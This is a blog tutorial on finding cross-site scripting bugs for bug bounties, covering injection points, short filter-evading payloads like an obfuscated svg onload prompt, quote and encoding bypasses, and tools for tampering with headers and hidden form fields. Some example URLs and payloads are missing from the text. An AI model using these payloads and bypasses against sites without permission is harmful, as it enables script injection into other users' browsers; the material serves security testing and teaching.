Modern techniques for XSS discovery

The most common web app bug that meets minimum qualifications for bug bounty programs is decidedly cross-site scripting. I was a little frustrated with the introductory pages I found on the topic while researching for the past few months so this is my attempt to slightly improve the state of affairs. If you want to get your name listed in your first Hall of Fame or receive your first bug bounty prize you could do worse than read on.

Quick intro to how XSS works

Cross-site scripting is a bug where an attacker can inject arbitary HTML or Javascript into a vulnerable page. There’s a couple different flavors of XSS: reflected and persistent.

Reflected XSS bugs happen when a page takes user input and reflects that input in the code of the page. If the page does not filter the user input for characters that have special meaning in HTML/Javascript like double quotes (“) or angled brackets (< >) then the attacker can inject malicious code. Example: if reflects YourUsername in the page’s code then you could craft a link like<script>alert(1)</script>. Send that link to a victim and their browser will run whatever javascript you put between the <script> tags as if it was actually part of’s source code. In this case it will simply open a pop up with the message, “1”. For a look at the kind of power a simple reflected XSS like this might have, check out the BeEF project.

Persistent XSSes are when a page takes user input and stores it server-side unfiltered. Quintessential example is forum software that doesn’t filter user posts. If a user makes a thread post that includes something like <script src=””></script> then anyone who visits that thread will have malicious.js run within their browser automatically. These are obviously a more severe vulnerabilities than reflected XSS since the victim doesn’t have to be socially engineered to click a specially crafted link. Persistent XSSes could lead to self-replicating XSS worms as seen in MySpace a long time ago and TweetDeck more recently.

Often people talk about DOM-based XSS as being a third class of XSS but seems to me these are really just a subtype of reflected XSS as they cannot be stored on the server. They are a bit sneakier than classic reflected XSSes though since the server never even knows that DOM-based XSSes are being triggered. These types of XSS are significantly more difficult to find especially through manual testing. If you’re interested in discovering these you should probably look into using the premium DOMinatorPro too but other than that we’re going to consider DOM-based XSS out of scope for this article.

XSS attack vectors

Any user input on a page is an XSS attack vector. User input vectors: URL variables (and the URL itself in the case of DOM-based XSS), form fields both hidden and explicit, and HTTP headers are all places that users can modify content and exploit XSS bugs. I’ll use the simple XSS payload of <script>alert(1)</script> for the following examples but we will discuss better payloads a little further down.

If my experience and my readings of others’ experience can be trusted, URL variables are the most common XSS attack vector. Take for example the URL This URL has 3 XSS attack vectors, the id variable, date variable, and score variable. To test this URL for XSS one might try testing the id variable by visiting the page<script>alert(1)</script>&date=081014&score=987439. If the id variable is vulnerable, you will see a javascript pop up that just says “1” inside it. Simple.

Form input vectors are probably the next most common. Within this vector you’ll most often see bugs in things like the search box that many sites employ. Simple exploitation of this vector would be to enter <script>alert(1)</script> in the search box and hit enter. If you get a javascript pop up on the returned page then you’ve found an XSS bug. Search boxes and text boxes in general are very conspicuous places that sites take user input so if you’re testing a big, well-funded site the programmers will not often be lazy or uninformed enough to not filter input in these places.
However tons of big sites use hidden form fields all over the place. You can identify these by looking at the source code, Ctrl-F to search for <form and look for  type=”hidden” value=”something”. These are more often overlooked since there’s no way for a user inside a normal browser to modify a hidden form field value. In order to modify a hidden form field value you must make a POST to the URL where the payload of the POST is: HiddenVar1=injecthere&HiddenVar2=injecthere&HiddenVar3=SoOnAndSoForth. I found this kind of XSS in a major telco’s site.

Last, we have HTTP headers as attack vectors. I have found that as a whole this is a probably the rarest of XSS-vulnerable vectors meaning if you took a census of the whole internet you would find the least amount of XSS vulnerabilities coming from this vector. Not many sites have a reason to reflect an HTTP header value directly into the source code of the page. That being said, it does seem to be a disproportionately common vulnerability amongst high value targets like very large websites and sites that participate in bug bounty programs. The Referer header, in particular, seems to be a thorn in the side of major websites. This might stem from the fact that the Referer header doesn’t always exist when you hit a URL so it is particularly easy for a programmer or QA engineer to forget to filter input from this vector. Headers that I believe are most commonly XSS vulnerable are Referer, Cookie, and User-Agent. I have personally only seen Referer header XSSes in the wild while I have seen at least one example of a Cookie header-based XSS and have never seen a User-Agent XSS despite having read that that should be a place to test. I’ve heard of some other headers that people have discovered were reflected unfiltered in source code but I cannot find hard evidence of any of them. Please contribute a comment with any other headers you’ve seen in the wild that have been vulnerable to XSS.

I discovered an XSS vulnerability in the homepage due to the Referer header recently. Amazon returned the Referer header value unfiltered in the homepage’s source code within a javascript function that seemed to do something with ads on the page. When joined HackerOne’s bug bounty program they also had an XSS in their homepage due to the unfiltered reflection of the Referer header value. This attack vector, like hidden form fields, requires special tools/techniques to exploit which we’ll get to soon.

XSS payloads

When looking at most intro to XSS guides they pretty much all say the same thing: <script>alert(1)</script>. This payload is OK, but why would you use a payload that’s longer than necessary and specifically gets caught by a ton of filters? Instead of <script>alert(1)</script> use this:


It’s the shortest consistently working payload I have found. This payload has a number of benefits. You will rarely if ever encounter a WAF or filter that specifically looks for the <svg> tag  as a potential XSS attempt. This payload has no spaces which are sometimes filtered out. It uses prompt rather than alert which is very commonly filtered or looked for by WAFs. It uses a digit as the prompt message rather than a string which requires quotes and the digit it uses is not “1” which is also very commonly picked up as an XSS attempt by filters and WAFs. Last, we obfuscate it from poorly created regex filtering by throwing in some capitals.

XSS bugs can be reflected only in 2 places within the source code of a site: between HTML tags like:


or inside an HTML attribute like:

<a href=””>

If the XSS bug is between HTML tags then you’d use <sVg/OnLOaD=prompt(9)>. If it’s inside an HTML attribute then you’d need to close the attribute value with a quote or more likely a double quote followed by a closing angle bracket so it’d look like “><sVg/OnLOaD=prompt(9)>. In my experience you will probably find slightly more XSS bugs within HTML attributes than just dangling between HTML tags. You will also see some injection points inside javascript functions but those technically fall into the between-tag category. You can often exploit those without < or > by closing out the function with various kinds of parenthesis, a semicolon, then a prompt(9). The payload might end up looking something like this but will be very situationally dependant:

x'; prompt(9);

The x'; might close out a variable that’s being defined and end that javascript statement allowing you to inject your own javacsript afterwards. Ideally your < and > will just be unfiltered so you don’t have to figure out how to get working Javascript going and your payload will look like:


One of the problems with pages like OWASP’s XSS payload page is that it shows a million XSS payloads for various situations but doesn’t make any effort to organize them by usefulness. The vast majority of them require the < and > to be unfiltered. If the < and > are unfiltered then 95% chance <sVg/OnLOaD=prompt(9)> will work just fine. Other payload examples have unnecessary features that increase the chance of them getting filtered like adding spaces to the pop up message. Some use String.fromChar for the pop up message to avoid quotes in case quotes are filtered but that just extends the length of the payload unnecessarily. Just use a single digit as the pop up message to avoid hitting any input character limits.

Avoiding filters

Basically it all boils down to whether or not “, ‘, <, and > are filtered. Those are the most important characters for exploiting XSS. If they are filtered then you have dozens and dozens of slightly different ways to encode those characters but only a few ways are actually high percentage. URL encoding and HTML encoding have been the only two kinds of filter-evading encoding schemes that I’ve seen work in the wild in my limited experience. That doesn’t mean you shouldn’t try others, but if you still can’t bypass the filter with those two kinds of encoding then the majority of the time you’re not going to find success. HTML encoding generally won’t work for URL parameter XSS bugs, but was used to massive effect by bug hunter behrouz against Yahoo!. Behrouz was able to sneak quotes by the Yahoo! filter for his form field persistent XSS on their comment system by HTML encoding it as &amp;quot;. This lead to an XSS exploit against virtually every property since they all used the same comment form system. URL encoding a quote would look like: %22. The best resource I’ve found for listing a myriad of ways to encode characters is but generally all you’ll need to try are the encodings found at

Manual XSS testing tools

Firefox is the main tool you will require. You could get fancy and use ZAP or Burp in addition to Firefox but its not necessary to open a large Java program just to edit some headers. The reason we use Firefox and not any of the other big 3 browsers is because Chrome and IE both have XSS filters built into them which are rather effective against our run-of-the-mill reflected XSS attacks. Firefox only has the Content Security Policy header which rarely gets in the way. If you do suspect CSP is getting in the way of your proof-of-concept screenshot of the javascript pop up then you might want to use Xenotix to collect that evidence. To fully test for XSS you will need to add the extensions HackBar and Tamper Data.

HackBar should be used for testing XSS via POST loads like changing a hidden form field value. To do that just enter the URL in the top half of the the HackBar toolbar then the POST payload in the bottom half of the toolbar and hit execute. Tamper Data can add, remove, and edit HTTP headers  as well as bypass client-side filtering. Example of client-side filtering would be the forum software vendor XSS I found a while back. In their sign up page they used javascript that ran in your browser to filter out dangerous characters. All one had to do to exploit this vulnerability was enter legal characters in the form, fire up Tamper Data, tamper just the initial request (uncheck the checkbox in the pop up you’ll see), enter the XSS payload in one or more of the POST parameter values on the right and send it on its way to the server who assumed the characters are safe to render.


Using the logic and methods above have netted me many responsible disclosures against sites like,,, and an assortment of other high traffic and bug bounty-participating sites. I had a little help from my buddy Python in the discovery of some of those vulnerabilities, but that is for the next post.

flattr this!

Posted in Uncategorized Tagged with: , ,

Leave a Reply

Your email address will not be published. Required fields are marked *


8 × six =

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>